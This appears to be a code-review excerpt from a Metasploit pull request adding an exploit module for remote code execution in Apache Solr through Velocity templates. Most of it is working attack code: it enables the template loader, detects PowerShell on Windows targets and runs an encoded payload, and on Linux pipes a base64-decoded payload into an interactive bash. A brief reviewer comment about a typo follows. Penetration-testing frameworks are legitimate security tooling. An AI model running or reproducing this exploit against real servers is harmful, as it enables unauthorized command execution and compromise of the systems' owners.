modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,404 @@
+      unless update_config.code == 200
+        fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
+      end
+
+      print_good("params.resource.loader.enabled is now set to true!")
+    end
+
+    # windows...
+    if @target_platform.include? "Windows"
+      # if target is wrong, warn and exit before doing anything
+      unless target.name.include? "Windows"
+        fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
+      end
+
+      # exploiting for Windows relies heavily on PowerShell, so go find it first
+      # lazy check for PowerShell
+      psh_enum = execute_command("where powershell", {'core_name' => @core_name})
+      # did it connect?
+      unless psh_enum
+        fail_with Failure::Unreachable, "Connection failed!"
+      end
+      # no PowerShell found by automatic check?
+      unless (/powershell/i) =~ psh_enum.body.to_s
+        # manual check for PowerShell
+        psh_enum_second = execute_command("cmd /c dir C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", {'core_name' => @core_name})
+        # got a successful connection?
+        unless psh_enum_second
+          fail_with Failure::Unreachable, "Connection failed!"
+        end
+        # no PowerShell found by manual check?
+        unless (/powershell/i) =~ psh_enum_second.body.to_s
+          # abort the exploit if PowerShell was not found
+          # TODO: CmdStager?
+          fail_with Failure::NoTarget, "PowerShell not found, aborting exploit attempt!"
+        end
+      end
+
+      print_good("PowerShell found, good to go!")
+      # generate PowerShell command, encode with base64, and remove comspec
+      psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+      # manually specify PowerShell path
+      if psh_enum_second
+        psh_cmd.insert(0, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\")
+      end
+
+      # prepare to exploit...
+      execute_command(psh_cmd, {'core_name' => @core_name})
+    end
+
+    # or unix-based?
+    if @target_platform.include? "Linux"
+      # if target is wrong, warn and exit before doing anything
+      unless target.name.include? "Unix"
+        fail_with Failure::NoTarget, "Target is found to be Unix-based, please select the proper target!"
+      end
+
+      # base64 payload has to be URI encoded
+      b64_payload = Rex::Text.encode_base64(generate_payload().raw)
+      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
+      bash_cmd = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
+      # prepare to exploit...
+      execute_command(bash_cmd, {'core_name' => @core_name})
+    end
+  end
+
+  # sic 'em, bois!
+  def execute_command(cmd, opts = {})
+    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fials
```

Comment:
```suggestion
    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fails
```

Also, is `cmd must be uri-encoded` still relevant ?

Reply:
Nope. Kicked in commit daae0886fa2080113de149c45eceb478c6b9ad29.